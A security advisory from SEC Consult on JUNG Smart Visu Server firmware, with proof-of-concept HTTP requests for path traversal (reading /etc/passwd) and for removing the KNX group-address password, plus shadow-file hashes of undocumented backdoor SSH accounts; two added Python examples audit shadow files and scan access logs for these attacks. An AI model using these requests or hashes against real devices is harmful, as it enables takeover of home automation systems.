SEC Consult SA-20170207 :: Path Traversal, Backdoor accounts & KNX group address password bypass in JUNG Smart Visu server

SEC Consult Vulnerability Lab Security Advisory < 20170207-0 >
=========================================================================
              title: Path Traversal, Backdoor accounts & KNX group address
                     password bypass
            product: JUNG Smart Visu Server
 vulnerable version: Firmware v1.0.804/1.0.830/1.0.832
      fixed version: Firmware v1.0.900
         CVE number: -
             impact: Critical
           homepage: http://www.jung.de/
              found: 2016-11-10
                 by: T. Weber (Office Vienna)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult
                     Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
                     Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

                     https://www.sec-consult.com
=========================================================================

Vendor description:
-------------------
"JUNG provides equipment and systems that win over by advanced technology,
sophisticated design, and a large variety of features. On the one hand,
our portfolio includes switches, socket outlets, dimmer, and observers.
On the other, it includes innovative systems for controlling features in
your home. From lighting, blind, or temperature control to wireless and
KNX technologies, door communication, and multimedia control, a large
range of applications is covered. In addition to comfort and security,
also the requirements regarding cost-effectiveness and energy efficiency
are met."

Source: http://www.jung.de/en/1828/company/company-portrait/


Business recommendation:
------------------------
Attackers are able to gain root access through SSH with the credentials of
the backdoor user account. An attacker can also unlock the group address
protection for the KNX device mapping.

JUNG has provided updated firmware which should be installed immediately.


SEC Consult recommends not to use this product in a production environment
until a thorough security review has been performed by security professionals
and all identified issues have been resolved.


Vulnerability overview/description:
-----------------------------------
1) Path Traversal Vulnerability
The Smart Visu Server runs with root privileges and is vulnerable to path
traversal. Because the web server runs as root, this leads to full information
disclosure of all files on the system.

2) Backdoor Accounts
Two undocumented operating system user accounts are present on the appliance.
They can be used to gain access to the Smart Visu Server via SSH.

3) Group Address (GA) unlock without Password
As a protection feature, the KNX group address mapping can be locked with a
user-defined password. This password can be removed with a single PUT
request. An attacker can then completely change the configuration of the
connected devices (e.g. a light switch in the kitchen can be swapped with the
air conditioner).


Proof of concept:
-----------------
1) Path Traversal Vulnerability
The Smart Visu Server is vulnerable to path traversal by sending the
following GET request:
------------------------------------ Request --------------------------------
GET /SV-Home//..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd HTTP/1.1
Host: <IP-Address>
[...]

----------------------------------- Response --------------------------------
HTTP/1.1 200 OK
Content-Disposition: inline;filename="passwd"
[...]

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
[...]
-----------------------------------------------------------------------------

2) Backdoor Accounts
Two undocumented operating system user accounts are present on the appliance.
They can be used to gain access to the Smart Visu Server over SSH on port
55555.

Excerpt of the shadow file:
root:$6$Zcv.yVRg$0OfnoSEEWdP4K/2z5Mm/56nfGbdAPl4ZSm3oDWqn3fMD9cXfZCov7O/siheuYggHxuqHvZQ7nPSBM5BcbrH9n.:16840:0:99999:7:::
daemon:*:15914:0:99999:7:::
[...]
avahi:*:16541:0:99999:7:::
jung:$6$1SblJl3F$q6h6vfSC.IataQSqDNGw0wGvV8m/x8uLozBIj4Yj.ZzMoHbaMvzb2tR.B45I/ajsWpwkTcCNGjSZsLdC9IuzD.:16714:0:99999:7:::
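The practical question for anyone operating such an appliance is how to spot accounts like these on their own devices. The Python below is an added example and not part of the advisory: it parses content in `/etc/shadow` format and reports every account whose password field would let a login succeed but which is not on the operator's documented list, plus entries with an empty password field or a weak hash algorithm. The sample shadow content mirrors the layout of the excerpt above but its hash values are placeholders, not the hashes from the appliance, and the list of documented login accounts is an assumption for the demo.

```python
from dataclasses import dataclass
from typing import List, Set

# Constructed /etc/shadow content; hash values are placeholders for the demo.
SAMPLE_SHADOW = """\
root:$6$SALTPLACEHOLDER$HASHPLACEHOLDERroot:16840:0:99999:7:::
daemon:*:15914:0:99999:7:::
bin:*:15914:0:99999:7:::
sys:*:15914:0:99999:7:::
www-data:!:15914:0:99999:7:::
avahi:*:16541:0:99999:7:::
jung:$6$SALTPLACEHOLDER$HASHPLACEHOLDERjung:16714:0:99999:7:::
legacy:$1$SALTPLACEHOLDER$HASHPLACEHOLDERlegacy:15000:0:99999:7:::
"""

# Accounts the operator documents as allowed to log in (assumption for the demo).
DOCUMENTED_LOGINS: Set[str] = {"root"}

# Password-field values that mean "locked" or "no password set".
LOCKED_MARKERS = ("*", "!", "!!", "*LK*", "!*")


@dataclass
class Finding:
    user: str
    reason: str


def password_is_usable(field: str) -> bool:
    """True if the second shadow field lets password authentication succeed.

    '*' and anything starting with '!' are locked; an empty field means no
    password is required at all and is handled separately by the audit.
    """
    return field != "" and field not in LOCKED_MARKERS and not field.startswith("!")


def login_capable_users(shadow_text: str) -> Set[str]:
    """Users whose shadow entry carries a usable password hash."""
    users: Set[str] = set()
    for line in shadow_text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) >= 2 and password_is_usable(fields[1]):
            users.add(fields[0])
    return users


def audit_shadow(shadow_text: str, documented: Set[str] = DOCUMENTED_LOGINS) -> List[Finding]:
    """Flag entries an operator would not expect to be able to authenticate."""
    findings: List[Finding] = []
    for lineno, line in enumerate(shadow_text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 2:
            findings.append(Finding(line, f"line {lineno}: malformed entry"))
            continue
        user, pw = fields[0], fields[1]
        if pw == "":
            findings.append(Finding(user, "empty password field, login without password"))
            continue
        if not password_is_usable(pw):
            continue
        if user not in documented:
            findings.append(Finding(user, "undocumented account with a usable password hash"))
        # Crypt scheme is the '$id$' prefix: $6$ is SHA-512, $1$ is MD5, no '$' is DES.
        if pw.startswith("$1$"):
            findings.append(Finding(user, "MD5-crypt hash, weak scheme"))
        elif not pw.startswith("$"):
            findings.append(Finding(user, "DES-crypt hash, weak scheme"))
    return findings


if __name__ == "__main__":
    for f in audit_shadow(SAMPLE_SHADOW):
        print(f"{f.user}: {f.reason}")
```

Run it over the real `/etc/shadow` (root access required) and compare the output with the vendor's documentation of intended accounts; on this appliance the audit should be paired with a check of which port the SSH daemon listens on, since the advisory reports the backdoor accounts being reachable over port 55555 rather than the default port 22.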

3) Group Address (GA) unlock without Password
The following PUT request sends a JSON object to the server, which removes the
password:
------------------------------------ Request --------------------------------
PUT /rest/items/knxcom_datastore HTTP/1.1
Host: <IP-Address>
[...]

{"groupNames":[],"name":"knxcom_datastore","label":"knxcom_datastore","type":"GroupItem","tags":["{"lock_ga":false}"]}
-----------------------------------------------------------------------------
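Until the firmware update is installed there is no workaround, so the remaining defensive lever is visibility: both the traversal probe from section 1 and the password-removing PUT above leave a distinctive trace in the web server's access log. The Python below is an added example, not code from the advisory or from JUNG, that scans Common Log Format lines for the two patterns: any request whose fully decoded path contains `../` (flagging double-encoding and a 200 response), and any state-changing request to the `/rest/items/` store. The log lines are constructed for the demo (made-up addresses, timestamps and sizes); the `/rest/items/` prefix and the double-encoded path come from the advisory's requests.

```python
import re
from typing import List, Tuple
from urllib.parse import unquote

# Constructed access-log lines in Common Log Format. Addresses, timestamps and
# sizes are made up; the two suspicious requests mirror the advisory's PoCs.
SAMPLE_LOG = """\
192.0.2.10 - - [07/Feb/2017:10:00:01 +0100] "GET /SV-Home/index.html HTTP/1.1" 200 5120
192.0.2.77 - - [07/Feb/2017:10:00:07 +0100] "GET /SV-Home//..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd HTTP/1.1" 200 1432
192.0.2.77 - - [07/Feb/2017:10:00:12 +0100] "PUT /rest/items/knxcom_datastore HTTP/1.1" 200 0
192.0.2.10 - - [07/Feb/2017:10:00:20 +0100] "GET /rest/items/knxcom_datastore HTTP/1.1" 200 311
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+$'
)

# Path prefix of the REST item store, from the advisory's PUT request.
REST_ITEMS_PREFIX = "/rest/items/"
STATE_CHANGING = {"PUT", "POST", "DELETE", "PATCH"}


def fully_decode(s: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly so '%252f' and '%2f' both become '/'."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def classify(method: str, path: str, status: int) -> List[str]:
    """Return the alert strings that apply to one request."""
    alerts: List[str] = []
    decoded = fully_decode(path)
    if "../" in decoded or "..\\" in decoded:
        tag = "path traversal attempt"
        if "%25" in path.lower():
            tag += " (double-encoded)"
        if status == 200:
            tag += ", server answered 200"
        alerts.append(tag)
    if method in STATE_CHANGING and path.startswith(REST_ITEMS_PREFIX):
        alerts.append(f"{method} to REST item store {path[len(REST_ITEMS_PREFIX):]}")
    return alerts


def scan_log(text: str) -> List[Tuple[str, str, List[str]]]:
    """Parse CLF lines and return (client, path, alerts) for flagged requests."""
    hits: List[Tuple[str, str, List[str]]] = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparsable line; a real pipeline would count these
        alerts = classify(m["method"], m["path"], int(m["status"]))
        if alerts:
            hits.append((m["ip"], m["path"], alerts))
    return hits


if __name__ == "__main__":
    for ip, path, alerts in scan_log(SAMPLE_LOG):
        print(ip, path, "->", "; ".join(alerts))
```

A traversal alert with a 200 response is the one to treat as a confirmed disclosure rather than a probe; for the item store, every PUT on a device whose only protection for the mapping was the lock deserves a review of who sent it and what the mapping looks like afterwards.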


Vulnerable / tested versions:
-----------------------------
Firmware versions 1.0.804, 1.0.830 and 1.0.832 have been tested and found to be
vulnerable.


Vendor contact timeline:
------------------------
2016-11-21: Contacting vendor through kundencenter@jung.de, mail.vka@jung.de
2016-12-02: Initial phone call with vendor. Advisory sent as encrypted archive.
2016-12-16: Call with vendor. Patch will be available in January 2017.
2017-01-09: Call with vendor. Patch will be approximately available in CW4.
            Release shifted to 2017-01-30.
2017-01-25: Call with vendor. Patch is stable in version 1.0.900 and will be
            released on 2017-02-07 in CW5. Shifted release of advisory to
            2017-02-07.
2017-02-07: Public release of advisory


Solution:
---------
Upgrade to firmware version 1.0.900 which is being provided by JUNG
through automatic updates.


Workaround:
-----------
None.


Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/Career.htm

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/About/Contact.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF T. Weber / @2017

